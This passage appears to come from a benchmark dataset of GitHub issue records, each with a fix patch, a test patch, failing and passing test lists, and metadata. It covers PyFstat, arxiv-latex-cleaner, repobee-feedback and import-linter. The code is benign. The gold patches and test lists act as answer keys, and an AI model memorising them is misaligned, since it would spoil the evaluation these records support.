+ f"Lengths of destination and source vectors do not match. ({dest.length} != {src.length})"
+ )
+ dest.TAtom = src.TAtom
+ for k in range(dest.length):
+ # this is now copying the actual FstatAtom object,
+ # with its actual data in memory (no more pointers)
+ dest.data[k] = src.data[k]
|
PyFstat/PyFstat
|
c502303284fc4fba4dbe34eee1063d0f75d8b7e5
|
diff --git a/tests/test_utils/test_atoms.py b/tests/test_utils/test_atoms.py
new file mode 100644
index 0000000..a425fec
--- /dev/null
+++ b/tests/test_utils/test_atoms.py
@@ -0,0 +1,75 @@
+import lalpulsar
+import pytest
+
+from pyfstat.utils import (
+ copy_FstatAtomVector,
+ extract_singleIFOmultiFatoms_from_multiAtoms,
+)
+
+
+@pytest.fixture
+def arbitrary_singleAtoms():
+ single_atoms = lalpulsar.CreateFstatAtomVector(5)
+
+ single_atoms.TAtom = 1800
+
+ for i in range(single_atoms.length):
+
+ for attr in [
+ "timestamp",
+ "a2_alpha",
+ "b2_alpha",
+ "ab_alpha",
+ "Fa_alpha",
+ "Fb_alpha",
+ ]:
+ setattr(single_atoms.data[i], attr, i)
+
+ return single_atoms
+
+
+@pytest.fixture
+def arbitrary_multiAtoms(arbitrary_singleAtoms):
+ ma = lalpulsar.CreateMultiFstatAtomVector(1)
+ ma.data[0] = arbitrary_singleAtoms
+ return ma
+
+
+def compare_FstatAtomVector(vectorA, vectorB):
+
+ for attr in ["TAtom", "length"]:
+ assert getattr(vectorA, attr) == getattr(vectorB, attr)
+
+ for i in range(vectorA.length):
+
+ for attr in [
+ "timestamp",
+ "a2_alpha",
+ "b2_alpha",
+ "ab_alpha",
+ "Fa_alpha",
+ "Fb_alpha",
+ ]:
+ assert getattr(vectorA.data[i], attr) == getattr(vectorB.data[i], attr)
+
+
+def test_extract_singleIFOmultiFatoms_from_multiAtoms(
+ arbitrary_singleAtoms, arbitrary_multiAtoms
+):
+
+ single_atoms = extract_singleIFOmultiFatoms_from_multiAtoms(arbitrary_multiAtoms, 0)
+ compare_FstatAtomVector(single_atoms.data[0], arbitrary_multiAtoms.data[0])
+
+ with pytest.raises(ValueError):
+ extract_singleIFOmultiFatoms_from_multiAtoms(arbitrary_multiAtoms, 1)
+
+
+def test_copy_FstatAtomVector(arbitrary_singleAtoms):
+
+ single_atoms = lalpulsar.CreateFstatAtomVector(arbitrary_singleAtoms.length)
+ copy_FstatAtomVector(single_atoms, arbitrary_singleAtoms)
+ compare_FstatAtomVector(single_atoms, arbitrary_singleAtoms)
+
+ faulty_atoms = lalpulsar.CreateFstatAtomVector(arbitrary_singleAtoms.length + 1)
+ with pytest.raises(ValueError):
+ copy_FstatAtomVector(faulty_atoms, arbitrary_singleAtoms)
|
segmentation fault from BSGL grid test with recent LALSuite nightlies
**Describe the bug**
see https://github.com/PyFstat/PyFstat/actions/runs/3360239212/jobs/5569188206#step:7:104
The first failing version seems to be `7.10.1.dev20221025`.
Note that the non-BSGL `TestGridSearch::test_semicoherent_grid_search` does **not** segfault.
**Expected behavior**
no segfault
**Environment (please complete the following information):**
- see action setup, but can aso reproduce locally
**To Reproduce**
```
pip install --upgrade --pre lalsuite==7.10.1.dev20221025
pytest tests/test_grid_based_searches.py::TestGridSearchBSGL::test_semicoherent_grid_search
```
**Additional context**
---
|
0.0
|
c502303284fc4fba4dbe34eee1063d0f75d8b7e5
|
[
"tests/test_utils/test_atoms.py::test_extract_singleIFOmultiFatoms_from_multiAtoms",
"tests/test_utils/test_atoms.py::test_copy_FstatAtomVector"
] |
[] |
{
"failed_lite_validators": [
"has_added_files",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-11-01 17:07:09+00:00
|
mit
| 549
|
|
google-research__arxiv-latex-cleaner-29
|
diff --git a/arxiv_latex_cleaner/arxiv_latex_cleaner.py b/arxiv_latex_cleaner/arxiv_latex_cleaner.py
index 96dcd0c..bc12ddc 100644
--- a/arxiv_latex_cleaner/arxiv_latex_cleaner.py
+++ b/arxiv_latex_cleaner/arxiv_latex_cleaner.py
@@ -111,6 +111,36 @@ def _remove_environment(text, environment):
text)
+def _remove_iffalse_block(text):
+ """Removes possibly nested r'\iffalse*\fi' blocks from 'text'."""
+ p = re.compile(r'\\if(\w+)|\\fi')
+ level = -1
+ positions_to_del = []
+ start, end = 0, 0
+ for m in p.finditer(text):
+ if m.group() == r'\iffalse' and level == -1:
+ level += 1
+ start = m.start()
+ elif m.group().startswith(r'\if') and level >= 0:
+ level += 1
+ elif m.group() == r'\fi' and level >= 0:
+ if level == 0:
+ end = m.end()
+ positions_to_del.append((start, end))
+ level -= 1
+ else:
+ pass
+
+ for (start, end) in reversed(positions_to_del):
+ if end < len(text) and text[end].isspace():
+ end_to_del = end + 1
+ else:
+ end_to_del = end
+ text = text[:start] + text[end_to_del:]
+
+ return text
+
+
def _remove_comments_inline(text):
"""Removes the comments from the string 'text'."""
if 'auto-ignore' in text:
@@ -147,6 +177,7 @@ def _remove_comments(content, parameters):
"""Erases all LaTeX comments in the content, and writes it."""
content = [_remove_comments_inline(line) for line in content]
content = _remove_environment(''.join(content), 'comment')
+ content = _remove_iffalse_block(content)
for command in parameters['commands_to_delete']:
content = _remove_command(content, command)
return content
diff --git a/tex/main.tex b/tex/main.tex
index 2e434d5..0a9abac 100644
--- a/tex/main.tex
+++ b/tex/main.tex
@@ -15,6 +15,16 @@ This is a todo command\mytodo{Do this later}
\mytodo{This is a todo command with a nested \textit{command}.
Please remember that up to \texttt{2 levels} of \textit{nesting} are supported.}
+\newif\ifvar
+
+\ifvar
+\iffalse
+\ifvar
+Text
+\fi
+\fi
+\fi
+
\input{figures/figure_included.tex}
% \input{figures/figure_not_included.tex}
diff --git a/tex_arXiv_true/main.tex b/tex_arXiv_true/main.tex
index c3b203f..2df5b95 100644
--- a/tex_arXiv_true/main.tex
+++ b/tex_arXiv_true/main.tex
@@ -9,6 +9,11 @@ This is a percent \%.
This is a todo command
+\newif\ifvar
+
+\ifvar
+\fi
+
\input{figures/figure_included.tex}
\includegraphics{ext_tikz/test1.pdf}
|
google-research/arxiv-latex-cleaner
|
2045634c0b52bad482c9b3a0b507a7add84450e2
|
diff --git a/arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py b/arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py
index 0a34693..60258f1 100644
--- a/arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py
+++ b/arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py
@@ -88,6 +88,41 @@ class UnitTests(parameterized.TestCase):
arxiv_latex_cleaner._remove_environment(text_in, 'comment'),
true_output)
+ @parameterized.named_parameters(
+ {
+ 'testcase_name': 'no_iffalse',
+ 'text_in': 'Foo\n',
+ 'true_output': 'Foo\n'
+ }, {
+ 'testcase_name': 'if_not_removed',
+ 'text_in': '\\ifvar\n\\ifvar\nFoo\n\\fi\n\\fi\n',
+ 'true_output': '\\ifvar\n\\ifvar\nFoo\n\\fi\n\\fi\n'
+ }, {
+ 'testcase_name': 'if_removed_with_nested_ifvar',
+ 'text_in': '\\ifvar\n\\iffalse\n\\ifvar\nFoo\n\\fi\n\\fi\n\\fi\n',
+ 'true_output': '\\ifvar\n\\fi\n'
+ }, {
+ 'testcase_name': 'if_removed_with_nested_iffalse',
+ 'text_in': '\\ifvar\n\\iffalse\n\\iffalse\nFoo\n\\fi\n\\fi\n\\fi\n',
+ 'true_output': '\\ifvar\n\\fi\n'
+ }, {
+ 'testcase_name': 'if_removed_eof',
+ 'text_in': '\\iffalse\nFoo\n\\fi',
+ 'true_output': ''
+ }, {
+ 'testcase_name': 'if_removed_space',
+ 'text_in': '\\iffalse\nFoo\n\\fi ',
+ 'true_output': ''
+ }, {
+ 'testcase_name': 'if_removed_backslash',
+ 'text_in': '\\iffalse\nFoo\n\\fi\\end{document}',
+ 'true_output': '\\end{document}'
+ })
+ def test_remove_iffalse_block(self, text_in, true_output):
+ self.assertEqual(
+ arxiv_latex_cleaner._remove_iffalse_block(text_in),
+ true_output)
+
@parameterized.named_parameters(
{
'testcase_name': 'all_pass',
|
Nested \iffalse \fi block comments.
I used \iffalse ... \fi to block comment in my latex document, and used this modification of the _remove_environment command:
```
def _remove_iffalse(text):
"""Removes '\\iffalse *\\fi' from 'text'."""
"""This has problems with nested \\iffalse \\fi statements"""
return re.sub(
r'\\iffalse[\s\S]*?\\fi',
'', text)
```
However, this runs incorrectly on:
```
\iffalse
A
\iffalse
B
\fi
C
\fi
```
Which in latex outputs nothing, but with the _remove_iffalse code above outputs:
```
C
\fi
```
(I had one such nested comment in my document, because of commenting out a subsection of a section that was later commented out in its entirety.)
A similar problem does not exist for \begin{comment} \end{comment}, because
```
\begin{comment}
A
\begin{comment}
B
\end{comment}
C
\end{comment}
```
Does not compile in Latex.
|
0.0
|
2045634c0b52bad482c9b3a0b507a7add84450e2
|
[
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_iffalse_block_if_not_removed",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_iffalse_block_if_removed_backslash",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_iffalse_block_if_removed_eof",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_iffalse_block_if_removed_space",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_iffalse_block_if_removed_with_nested_iffalse",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_iffalse_block_if_removed_with_nested_ifvar",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_iffalse_block_no_iffalse"
] |
[
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_keep_pattern_all_pass",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_keep_pattern_not_all_pass",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_command_command_not_removed",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_command_command_removed",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_command_no_command",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_comments_inline_auto_ignore",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_comments_inline_comment",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_comments_inline_comment_inline",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_comments_inline_no_comment",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_comments_inline_percent",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_environment_environment_not_removed",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_environment_environment_removed",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_environment_no_environment",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_pattern_all_pass",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_pattern_not_all_pass",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_replace_tikzpictures_no_tikz",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_replace_tikzpictures_tikz_match",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_replace_tikzpictures_tikz_no_match"
] |
{
"failed_lite_validators": [
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2020-08-01 11:02:07+00:00
|
apache-2.0
| 2,561
|
|
repobee__repobee-feedback-26
|
diff --git a/repobee_feedback/_generate_multi_issues_file.py b/repobee_feedback/_generate_multi_issues_file.py
new file mode 100644
index 0000000..4f007cb
--- /dev/null
+++ b/repobee_feedback/_generate_multi_issues_file.py
@@ -0,0 +1,62 @@
+"""A helper command to automatically generate a file called issue.md
+wich contains templates of issues for multiple students assignments.
+
+.. module:: _generate_multi_issues_file
+ :synopsis: A helper command to automatically generate a file
+ called issue.md wich contains templates of issues for multiple
+ students assignments.
+
+.. moduleauthor:: Marcelo Freitas
+"""
+import pathlib
+import sys
+from typing import List
+
+import repobee_plug as plug
+from repobee_plug.cli.categorization import Action
+
+MULTI_ISSUES_FILENAME = "issue.md"
+
+GENERATE_MULTI_ISSUES_FILE_ACTION = Action(
+ name="generate-multi-issues-file",
+ category=plug.cli.CoreCommand.issues,
+)
+
+
+class GenerateMultiIssuesFile(plug.Plugin, plug.cli.Command):
+ __settings__ = plug.cli.command_settings(
+ help=(
+ "auto generate multi-issues file"
+ " for the `issues feedback` command"
+ ),
+ description="Will generate a multi-issues file template "
+ "where each pair of student assignment passed "
+ "will become an issue that starts with the line "
+ "#ISSUE#<STUDENT_REPO_NAME>#<ISSUE_TITLE>, followed by its "
+ "body. Title and body should be filled appropriately later.",
+ action=GENERATE_MULTI_ISSUES_FILE_ACTION,
+ base_parsers=[plug.BaseParser.ASSIGNMENTS, plug.BaseParser.STUDENTS],
+ )
+
+ def command(self):
+ content = _generate_multi_issues_file_content(
+ self.args.students, self.args.assignments
+ )
+
+ pathlib.Path(MULTI_ISSUES_FILENAME).write_text(
+ content, encoding=sys.getdefaultencoding()
+ )
+
+ plug.echo(f"Created multi-issues file '{MULTI_ISSUES_FILENAME}'")
+
+
+def _generate_multi_issues_file_content(
+ students: List[str], assignments: List[str]
+) -> str:
+
+ issue_headers = [
+ f"#ISSUE#{repo_name}#<ISSUE-TITLE>\n<ISSUE-BODY>"
+ for repo_name in plug.generate_repo_names(students, assignments)
+ ]
+
+ return "\n\n".join(issue_headers)
diff --git a/repobee_feedback/feedback.py b/repobee_feedback/feedback.py
index f4ceb59..cc6d488 100644
--- a/repobee_feedback/feedback.py
+++ b/repobee_feedback/feedback.py
@@ -15,6 +15,9 @@ from textwrap import indent
from typing import Iterable, Tuple, List, Mapping
import repobee_plug as plug
+from repobee_feedback._generate_multi_issues_file import ( # noqa: F401
+ GenerateMultiIssuesFile,
+)
PLUGIN_NAME = "feedback"
|
repobee/repobee-feedback
|
304e38cfcaaa1dba37dbe7bf52e37dca2387572f
|
diff --git a/tests/test_generate_multi_issues_file.py b/tests/test_generate_multi_issues_file.py
new file mode 100644
index 0000000..29b2c36
--- /dev/null
+++ b/tests/test_generate_multi_issues_file.py
@@ -0,0 +1,45 @@
+import sys
+
+import repobee
+from repobee_feedback._generate_multi_issues_file import (
+ MULTI_ISSUES_FILENAME,
+ GENERATE_MULTI_ISSUES_FILE_ACTION,
+ GenerateMultiIssuesFile,
+)
+
+
+class TestGenerateMultiIssuesFile:
+ """Tests generation of a multi-issues file"""
+
+ def test_creates_non_empty_output_file(self, tmp_path):
+ students = "alice bob".split()
+ assignments = "task-1 task-2".split()
+ command = [
+ *GENERATE_MULTI_ISSUES_FILE_ACTION.as_name_tuple(),
+ "--students",
+ *students,
+ "--assignments",
+ *assignments,
+ ]
+
+ expected_content = (
+ "#ISSUE#alice-task-1#<ISSUE-TITLE>\n"
+ "<ISSUE-BODY>\n\n"
+ "#ISSUE#bob-task-1#<ISSUE-TITLE>\n"
+ "<ISSUE-BODY>\n\n"
+ "#ISSUE#alice-task-2#<ISSUE-TITLE>\n"
+ "<ISSUE-BODY>\n\n"
+ "#ISSUE#bob-task-2#<ISSUE-TITLE>\n"
+ "<ISSUE-BODY>"
+ )
+
+ repobee.run(
+ command,
+ plugins=[GenerateMultiIssuesFile],
+ workdir=tmp_path,
+ )
+
+ outfile = tmp_path / MULTI_ISSUES_FILENAME
+ content = outfile.read_text(encoding=sys.getdefaultencoding())
+ assert outfile.is_file()
+ assert content == expected_content
|
Auto generate multi-issue file
I'm getting real tired of adding
#ISSUE#name-task-X#Pass/fail
to a file 15 times so I considered writing a plugin to do that for me but realized I can just add it to the feedback plugin if that's okay with you @slarse
I'm thinking something like:
`repobee issues feedback create-mi-file`
|
0.0
|
304e38cfcaaa1dba37dbe7bf52e37dca2387572f
|
[
"tests/test_generate_multi_issues_file.py::TestGenerateMultiIssuesFile::test_creates_non_empty_output_file"
] |
[] |
{
"failed_lite_validators": [
"has_added_files"
],
"has_test_patch": true,
"is_lite": false
}
|
2021-12-21 18:27:15+00:00
|
mit
| 5,246
|
|
seddonym__import-linter-79
|
diff --git a/AUTHORS.rst b/AUTHORS.rst
index b34e861..b0fa74b 100644
--- a/AUTHORS.rst
+++ b/AUTHORS.rst
@@ -9,3 +9,4 @@ Contributors
============
* Anthony Sottile - https://github.com/asottile
+* Łukasz Skarżyński - https://github.com/skarzi
diff --git a/CHANGELOG.rst b/CHANGELOG.rst
index 49ecc2c..3df7df3 100644
--- a/CHANGELOG.rst
+++ b/CHANGELOG.rst
@@ -87,3 +87,5 @@ latest
------
* Upgrade Grimp to 1.2.2.
+* Add SetField
+* Use a SetField for ignore_imports options
diff --git a/src/importlinter/contracts/forbidden.py b/src/importlinter/contracts/forbidden.py
index 89a10de..6badb2b 100644
--- a/src/importlinter/contracts/forbidden.py
+++ b/src/importlinter/contracts/forbidden.py
@@ -14,8 +14,8 @@ class ForbiddenContract(Contract):
- source_modules: A list of Modules that should not import the forbidden modules.
- forbidden_modules: A list of Modules that should not be imported by the source modules.
- - ignore_imports: A list of DirectImports. These imports will be ignored: if the import
- would cause a contract to be broken, adding it to the list will cause
+ - ignore_imports: A set of DirectImports. These imports will be ignored: if the import
+ would cause a contract to be broken, adding it to the set will cause
the contract be kept instead. (Optional.)
"""
@@ -23,7 +23,7 @@ class ForbiddenContract(Contract):
source_modules = fields.ListField(subfield=fields.ModuleField())
forbidden_modules = fields.ListField(subfield=fields.ModuleField())
- ignore_imports = fields.ListField(subfield=fields.DirectImportField(), required=False)
+ ignore_imports = fields.SetField(subfield=fields.DirectImportField(), required=False)
def check(self, graph: ImportGraph) -> ContractCheck:
is_kept = True
diff --git a/src/importlinter/contracts/independence.py b/src/importlinter/contracts/independence.py
index 71a7ff7..14f206e 100644
--- a/src/importlinter/contracts/independence.py
+++ b/src/importlinter/contracts/independence.py
@@ -16,15 +16,15 @@ class IndependenceContract(Contract):
Configuration options:
- modules: A list of Modules that should be independent from each other.
- - ignore_imports: A list of DirectImports. These imports will be ignored: if the import
- would cause a contract to be broken, adding it to the list will cause
+ - ignore_imports: A set of DirectImports. These imports will be ignored: if the import
+ would cause a contract to be broken, adding it to the set will cause
the contract be kept instead. (Optional.)
"""
type_name = "independence"
modules = fields.ListField(subfield=fields.ModuleField())
- ignore_imports = fields.ListField(subfield=fields.DirectImportField(), required=False)
+ ignore_imports = fields.SetField(subfield=fields.DirectImportField(), required=False)
def check(self, graph: ImportGraph) -> ContractCheck:
is_kept = True
diff --git a/src/importlinter/contracts/layers.py b/src/importlinter/contracts/layers.py
index 6aa43b5..cf15223 100644
--- a/src/importlinter/contracts/layers.py
+++ b/src/importlinter/contracts/layers.py
@@ -42,8 +42,8 @@ class LayersContract(Contract):
- layers: An ordered list of layers. Each layer is the name of a module relative
to its parent package. The order is from higher to lower level layers.
- containers: A list of the parent Modules of the layers (optional).
- - ignore_imports: A list of DirectImports. These imports will be ignored: if the import
- would cause a contract to be broken, adding it to the list will cause
+ - ignore_imports: A set of DirectImports. These imports will be ignored: if the import
+ would cause a contract to be broken, adding it to the set will cause
the contract be kept instead. (Optional.)
"""
@@ -51,7 +51,7 @@ class LayersContract(Contract):
layers = fields.ListField(subfield=LayerField())
containers = fields.ListField(subfield=fields.StringField(), required=False)
- ignore_imports = fields.ListField(subfield=fields.DirectImportField(), required=False)
+ ignore_imports = fields.SetField(subfield=fields.DirectImportField(), required=False)
def check(self, graph: ImportGraph) -> ContractCheck:
is_kept = True
diff --git a/src/importlinter/domain/fields.py b/src/importlinter/domain/fields.py
index 7809113..e226ec9 100644
--- a/src/importlinter/domain/fields.py
+++ b/src/importlinter/domain/fields.py
@@ -1,16 +1,18 @@
import abc
import re
-from typing import Any, List, Union
+from typing import Generic, Iterable, List, Set, TypeVar, Union
from importlinter.domain.imports import DirectImport, Module
+FieldValue = TypeVar("FieldValue")
+
class ValidationError(Exception):
def __init__(self, message: str) -> None:
self.message = message
-class Field(abc.ABC):
+class Field(Generic[FieldValue], abc.ABC):
"""
Base class for containers for some data on a Contract.
@@ -21,7 +23,7 @@ class Field(abc.ABC):
self.required = required
@abc.abstractmethod
- def parse(self, raw_data: Union[str, List[str]]) -> Any:
+ def parse(self, raw_data: Union[str, List[str]]) -> FieldValue:
"""
Given some raw data supplied by a user, return some clean data.
@@ -42,16 +44,13 @@ class StringField(Field):
return str(raw_data)
-class ListField(Field):
+class BaseMultipleValueField(Field):
"""
- A field for multiple values of any type.
+ An abstract field for multiple values of any type.
Arguments:
- - subfield: An instance of a single-value Field. Each item in the list will be the return
- value of this subfield.
- Usage:
-
- field = ListField(subfield=AnotherField())
+ - subfield: An instance of a single-value Field. Each item in the iterable will be
+ the return value of this subfield.
"""
@@ -59,7 +58,8 @@ class ListField(Field):
super().__init__(*args, **kwargs)
self.subfield = subfield
- def parse(self, raw_data: Union[str, List]) -> List[Any]:
+ @abc.abstractmethod
+ def parse(self, raw_data: Union[str, List]) -> Iterable[FieldValue]:
if isinstance(raw_data, tuple):
raw_data = list(raw_data)
if not isinstance(raw_data, list):
@@ -70,6 +70,37 @@ class ListField(Field):
return clean_list
+class ListField(BaseMultipleValueField):
+ """
+ A field for multiple values of any type.
+
+ Fields values are returned in list sorted by parsing order.
+
+ Usage:
+
+ field = ListField(subfield=AnotherField())
+ """
+
+ def parse(self, raw_data: Union[str, List]) -> List[FieldValue]:
+ return list(super().parse(raw_data))
+
+
+class SetField(BaseMultipleValueField):
+ """
+ A field for multiple, unique values of any type.
+
+ Fields values are returned inordered in set.
+
+ Usage:
+
+ field = SetField(subfield=AnotherField())
+
+ """
+
+ def parse(self, raw_data: Union[str, List]) -> Set[FieldValue]:
+ return set(super().parse(raw_data))
+
+
class ModuleField(Field):
"""
A field for Modules.
|
seddonym/import-linter
|
334b4d1b85bae7f21f7678e5bda17af0e7487af2
|
diff --git a/tests/unit/contracts/test_forbidden.py b/tests/unit/contracts/test_forbidden.py
index 684d8eb..e69dc93 100644
--- a/tests/unit/contracts/test_forbidden.py
+++ b/tests/unit/contracts/test_forbidden.py
@@ -125,6 +125,19 @@ class TestForbiddenContract:
):
contract.check(graph=graph)
+ def test_ignore_imports_tolerates_duplicates(self):
+ graph = self._build_graph()
+ contract = self._build_contract(
+ forbidden_modules=("mypackage.blue", "mypackage.yellow"),
+ ignore_imports=(
+ "mypackage.three -> mypackage.green",
+ "mypackage.utils -> mypackage.purple",
+ "mypackage.three -> mypackage.green",
+ ),
+ include_external_packages=False,
+ )
+ assert contract.check(graph=graph)
+
def _build_graph(self):
graph = ImportGraph()
for module in (
@@ -171,7 +184,9 @@ class TestForbiddenContract:
)
return graph
- def _build_contract(self, forbidden_modules, include_external_packages=False):
+ def _build_contract(
+ self, forbidden_modules, ignore_imports=None, include_external_packages=False
+ ):
session_options = {"root_packages": ["mypackage"]}
if include_external_packages:
session_options["include_external_packages"] = "True"
@@ -182,6 +197,7 @@ class TestForbiddenContract:
contract_options={
"source_modules": ("mypackage.one", "mypackage.two", "mypackage.three"),
"forbidden_modules": forbidden_modules,
+ "ignore_imports": ignore_imports or [],
},
)
diff --git a/tests/unit/contracts/test_independence.py b/tests/unit/contracts/test_independence.py
index fefc36d..db3ba26 100644
--- a/tests/unit/contracts/test_independence.py
+++ b/tests/unit/contracts/test_independence.py
@@ -392,3 +392,30 @@ def test_missing_module():
with pytest.raises(ValueError, match=("Module 'mypackage.bar' does not exist.")):
contract.check(graph=graph)
+
+
+def test_ignore_imports_tolerates_duplicates():
+ graph = ImportGraph()
+ graph.add_module("mypackage")
+ graph.add_import(
+ importer="mypackage.a", imported="mypackage.b", line_number=1, line_contents="-"
+ )
+ graph.add_import(
+ importer="mypackage.a", imported="mypackage.c", line_number=2, line_contents="-"
+ )
+ contract = IndependenceContract(
+ name="Independence contract",
+ session_options={"root_packages": ["mypackage"]},
+ contract_options={
+ "modules": ("mypackage.a", "mypackage.b"),
+ "ignore_imports": [
+ "mypackage.a -> mypackage.b",
+ "mypackage.a -> mypackage.c",
+ "mypackage.a -> mypackage.b",
+ ],
+ },
+ )
+
+ contract_check = contract.check(graph=graph)
+
+ assert contract_check.kept
diff --git a/tests/unit/contracts/test_layers.py b/tests/unit/contracts/test_layers.py
index 36b1086..82231c4 100644
--- a/tests/unit/contracts/test_layers.py
+++ b/tests/unit/contracts/test_layers.py
@@ -765,6 +765,20 @@ class TestIgnoreImports:
with pytest.raises(MissingImport):
contract.check(graph=graph)
+ def test_ignore_imports_tolerates_duplicates(self):
+ contract = self._build_contract(
+ ignore_imports=[
+ "mypackage.low.black -> mypackage.medium.orange",
+ "mypackage.utils.foo -> mypackage.utils.bar",
+ "mypackage.low.black -> mypackage.medium.orange",
+ ]
+ )
+ graph = self._build_graph()
+
+ contract_check = contract.check(graph=graph)
+
+ assert contract_check.kept
+
def _build_graph(self):
graph = ImportGraph()
for module in (
diff --git a/tests/unit/domain/test_fields.py b/tests/unit/domain/test_fields.py
index 851404a..76883f0 100644
--- a/tests/unit/domain/test_fields.py
+++ b/tests/unit/domain/test_fields.py
@@ -7,6 +7,7 @@ from importlinter.domain.fields import (
Field,
ListField,
ModuleField,
+ SetField,
StringField,
ValidationError,
)
@@ -83,9 +84,23 @@ class TestDirectImportField(BaseFieldTest):
"raw_data, expected_value",
(
(["mypackage.foo", "mypackage.bar"], [Module("mypackage.foo"), Module("mypackage.bar")]),
+ (["mypackage.foo", "mypackage.foo"], [Module("mypackage.foo"), Module("mypackage.foo")]),
("singlevalue", [Module("singlevalue")]),
),
)
class TestListField(BaseFieldTest):
field_class = ListField
field_kwargs = dict(subfield=ModuleField())
+
+
+@pytest.mark.parametrize(
+ "raw_data, expected_value",
+ (
+ (["mypackage.foo", "mypackage.bar"], {Module("mypackage.foo"), Module("mypackage.bar")}),
+ (["mypackage.foo", "mypackage.foo"], {Module("mypackage.foo")}),
+ ("singlevalue", {Module("singlevalue")}),
+ ),
+)
+class TestSetField(BaseFieldTest):
+ field_class = SetField
+ field_kwargs = dict(subfield=ModuleField())
|
Duplicate ignored_imports lead to confusing error
If you include an ignored import twice in a contract, you get the following error (as it tries to remove it the second time):
```
The edge mypackage.foo-mypackage.bar not in graph.
```
|
0.0
|
334b4d1b85bae7f21f7678e5bda17af0e7487af2
|
[
"tests/unit/contracts/test_forbidden.py::TestForbiddenContract::test_is_kept_when_no_forbidden_modules_imported",
"tests/unit/contracts/test_forbidden.py::TestForbiddenContract::test_is_broken_when_forbidden_modules_imported",
"tests/unit/contracts/test_forbidden.py::TestForbiddenContract::test_is_broken_when_forbidden_external_modules_imported",
"tests/unit/contracts/test_forbidden.py::TestForbiddenContract::test_is_invalid_when_forbidden_externals_but_graph_does_not_include_externals",
"tests/unit/contracts/test_forbidden.py::TestForbiddenContract::test_ignore_imports_tolerates_duplicates",
"tests/unit/contracts/test_forbidden.py::test_render_broken_contract",
"tests/unit/contracts/test_independence.py::TestIndependenceContract::test_when_modules_are_independent",
"tests/unit/contracts/test_independence.py::TestIndependenceContract::test_when_root_imports_root_directly",
"tests/unit/contracts/test_independence.py::TestIndependenceContract::test_when_root_imports_root_indirectly",
"tests/unit/contracts/test_independence.py::TestIndependenceContract::test_chains_via_other_independent_modules",
"tests/unit/contracts/test_independence.py::TestIndependenceContract::test_when_child_imports_child",
"tests/unit/contracts/test_independence.py::TestIndependenceContract::test_when_grandchild_imports_root",
"tests/unit/contracts/test_independence.py::test_ignore_imports[ignore_imports0-False]",
"tests/unit/contracts/test_independence.py::test_ignore_imports[ignore_imports1-True]",
"tests/unit/contracts/test_independence.py::test_ignore_imports[ignore_imports2-True]",
"tests/unit/contracts/test_independence.py::test_render_broken_contract",
"tests/unit/contracts/test_independence.py::test_missing_module",
"tests/unit/contracts/test_independence.py::test_ignore_imports_tolerates_duplicates",
"tests/unit/contracts/test_layers.py::TestLayerContractSingleContainers::test_no_illegal_imports_means_contract_is_kept",
"tests/unit/contracts/test_layers.py::TestLayerContractSingleContainers::test_illegal_child_imports_means_contract_is_broken",
"tests/unit/contracts/test_layers.py::TestLayerContractSingleContainers::test_illegal_grandchild_to_child_means_contract_is_broken",
"tests/unit/contracts/test_layers.py::TestLayerMultipleContainers::test_no_illegal_imports_means_contract_is_kept",
"tests/unit/contracts/test_layers.py::TestLayerMultipleContainers::test_imports_from_low_to_high_but_in_different_container_doesnt_break_contract",
"tests/unit/contracts/test_layers.py::TestLayerMultipleContainers::test_illegal_grandchild_imports_means_contract_is_broken",
"tests/unit/contracts/test_layers.py::TestLayerContractPopulatesMetadata::test_layer_contract_populates_metadata",
"tests/unit/contracts/test_layers.py::TestLayerContractPopulatesMetadata::test_layer_contract_populates_extra_firsts_one_indirect",
"tests/unit/contracts/test_layers.py::TestLayerContractPopulatesMetadata::test_layer_contract_populates_extra_firsts_two_indirects",
"tests/unit/contracts/test_layers.py::TestLayerContractPopulatesMetadata::test_layer_contract_populates_extra_lasts_one_indirect",
"tests/unit/contracts/test_layers.py::TestLayerContractPopulatesMetadata::test_layer_contract_populates_extra_lasts_two_indirects",
"tests/unit/contracts/test_layers.py::TestLayerContractPopulatesMetadata::test_layer_contract_populates_firsts_and_lasts_three_indirects",
